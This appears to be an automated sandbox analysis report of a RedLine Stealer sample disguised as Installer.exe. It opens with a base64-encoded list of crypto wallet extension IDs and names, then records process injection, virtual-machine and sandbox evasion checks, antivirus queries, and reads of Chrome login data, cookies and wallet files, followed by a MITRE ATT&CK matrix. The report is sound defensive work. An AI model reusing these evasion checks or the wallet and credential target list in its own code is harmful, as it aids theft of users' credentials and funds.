nb2dibmVlY3xSb25pbldhbGxldAphaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHxUZXJyYVN0YXRpb24KZm5uZWdwaGxvYmpkcGtoZWNhcGtpampka2djamhraWJ8SGFybW9ueVdhbGxldAphZWFjaGtubWVmcGhlcGNjaW9uYm9vaGNrb25vZWVtZ3xDb2luOThXYWxsZXQKY2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8VG9uQ3J5c3RhbApwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3xLYXJkaWFDaGFpbgpiZm5hZWxtb21laW1obHBtZ2puam9waGhwa2tvbGpwYXxQaGFudG9tCmZoaWxhaGVpbWdsaWduZGRramdvZmtjYmdla2hlbmJofE94eWdlbgptZ2Zma2ZiaWRpaGpwb2FvbWFqbGJnY2hkZGxpY2dwbnxQYWxpV2FsbGV0CmFvZGtrYWduYWRjYm9iZnBnZ2ZuamVvbmdlbWpiamNhfEJvbHRYCmtwZm9wa2VsbWFwY29pcGVtZmVuZG1kY2dobmVnaW1ufExpcXVhbGl0eVdhbGxldApobWVvYm5mbmZjbWRrZGNtbGJsZ2FnbWZwZmJvaWVhZnxYZGVmaVdhbGxldApscGZjYmprbmlqcGVlaWxsaWZua2lrZ25jaWtnZmhkb3xOYW1pV2FsbGV0CmRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfE1haWFyRGVGaVdhbGxldApmZm5iZWxmZG9laW9oZW5ramlibm1hZGppZWhqaGFqYnxZb3JvaVdhbGxldAppYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb2lob2ZlY3xUcm9ubGluawpqYmRhb2NuZWlpaW5tamJqbGdhbGhjZWxnYmVqbW5pZHxOaWZ0eVdhbGxldApua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnxNZXRhbWFzawphZmJjYmpwYnBmYWRsa21obWNsaGtlZW9kbWFtY2ZsY3xNYXRoV2FsbGV0CmhuZmFua25vY2Zlb2ZiZGRnY2lqbm1obmZua2RuYWFkfENvaW5iYXNlCmZoYm9oaW1hZWxib2hwamJibGRjbmdjbmFwbmRvZGpwfEJpbmFuY2VDaGFpbgpvZGJmcGVlaWhka2JpaG1vcGtiam1vb25mYW5sYmZjbHxCcmF2ZVdhbGxldApocGdsZmhnZm5oYmdwamRlbmpnbWRnb2VpYXBwYWZsbnxHdWFyZGFXYWxsZXQKYmxuaWVpaWZmYm9pbGxrbmpuZXBvZ2poa2dub2FwYWN8RXF1YWxXYWxsZXQKY2plbGZwbHBsZWJkamplbmxscGpjYmxtamtmY2ZmbmV8SmF4eHhMaWJlcnR5CmZpaGtha2ZvYmtta2pvanBjaHBmZ2NtaGZqbm1uZnBpfEJpdEFwcFdhbGxldAprbmNjaGRpZ29iZ2hlbmJiYWRkb2pqbm5hb2dmcHBmanxpV2FsbGV0CmFta21qam1tZmxkZG9nbWhwamxvaW1pcGJvZm5mamlofFdvbWJhdApmaGlsYWhlaW1nbGlnbmRka2pnb2ZrY2JnZWtoZW5iaHxBdG9taWNXYWxsZXQKbmxibW5uaWpjbmxlZ2tqanBjZmpjbG1jZmdnZmVmZG18TWV3Q3gKbmFuam1ka25oa2luaWZua2dkY2dnY2ZuaGRhYW1tbWp8R3VpbGRXYWxsZXQKbmtkZGduY2RqZ2pmY2RkYW1mZ2NtZm5saGNjbmltaWd8U2F0dXJuV2FsbGV0CmZuamhta2hobWtiamtrYWJuZGNubm9nYWdvZ2JuZWVjfFJvbmluV2FsbGV
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3788:120:WilError_01
                      Source: Installer.exeStatic file information: File size 2306455 > 1048576
                      Source: Installer.exeStatic PE information: Raw size of .JVWQ is bigger than: 0x100000 < 0x1f4000
                      Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_00124228 pushad ; ret 0_2_00124229
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_09BA5B42 push eax; retf 2_2_09BA5B49
                      Source: Installer.exeStatic PE information: section name: /4
                      Source: Installer.exeStatic PE information: section name: /14
                      Source: Installer.exeStatic PE information: section name: /29
                      Source: Installer.exeStatic PE information: section name: /41
                      Source: Installer.exeStatic PE information: section name: /55
                      Source: Installer.exeStatic PE information: section name: /67
                      Source: Installer.exeStatic PE information: section name: /80
                      Source: Installer.exeStatic PE information: section name: .JVWQ
                      Source: Installer.exeStatic PE information: section name: .JVWQ
                      Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_001214C0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001214C0
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .JVWQ
                      Source: Installer.exeStatic PE information: real checksum: 0x239810 should be: 0x23980f
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Users\user\Desktop\Installer.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)
                      Source: C:\Users\user\Desktop\Installer.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 4812Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 2400Thread sleep count: 3254 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 4984Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 3254Jump to behavior
                      Source: C:\Users\user\Desktop\Installer.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                      Source: C:\Users\user\Desktop\Installer.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                      Source: C:\Users\user\Desktop\Installer.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Installer.exeAPI coverage: 10.0 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: Installer.exe, 00000000.00000002.306845382.000000000163A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__!
                      Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_001214C0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_001214C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_00121150 Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,0_2_00121150

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 41C0000Jump to behavior
                      Source: C:\Users\user\Desktop\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 43CF008Jump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\Installer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 41C0000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 41C0000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\Installer.exeCode function: 0_2_0012162F GetVersion,0_2_0012162F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Installer.exe.13d4614.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.Installer.exe.1430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.AppLaunch.exe.41c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.304751719.0000000001432000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.306753398.00000000013D5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.370528626.00000000041C2000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 996, type: MEMORYSTR
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                      Source: AppLaunch.exe, 00000002.00000002.373473272.00000000066DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                      Source: AppLaunch.exe, 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: Yara matchFile source: 00000002.00000002.373473272.00000000066E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.373473272.0000000006782000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 996, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected RedLine Stealer
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Installer.exe.13d4614.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.Installer.exe.1430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.AppLaunch.exe.41c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.304751719.0000000001432000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.306753398.00000000013D5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.370528626.00000000041C2000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 996, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts221
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		311
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		431
                      Security Software Discovery                      		Remote Services1
                      Input Capture                      		Exfiltration Over Other Network Medium1
                      Encrypted Channel                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts1
                      Native API                      		Boot or Logon Initialization Scripts1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		1
                      Input Capture                      		11
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		Exfiltration Over Bluetooth1
                      Non-Standard Port                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)341
                      Virtualization/Sandbox Evasion                      		Security Account Manager341
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares3
                      Data from Local System                      		Automated Exfiltration1
                      Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)311
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
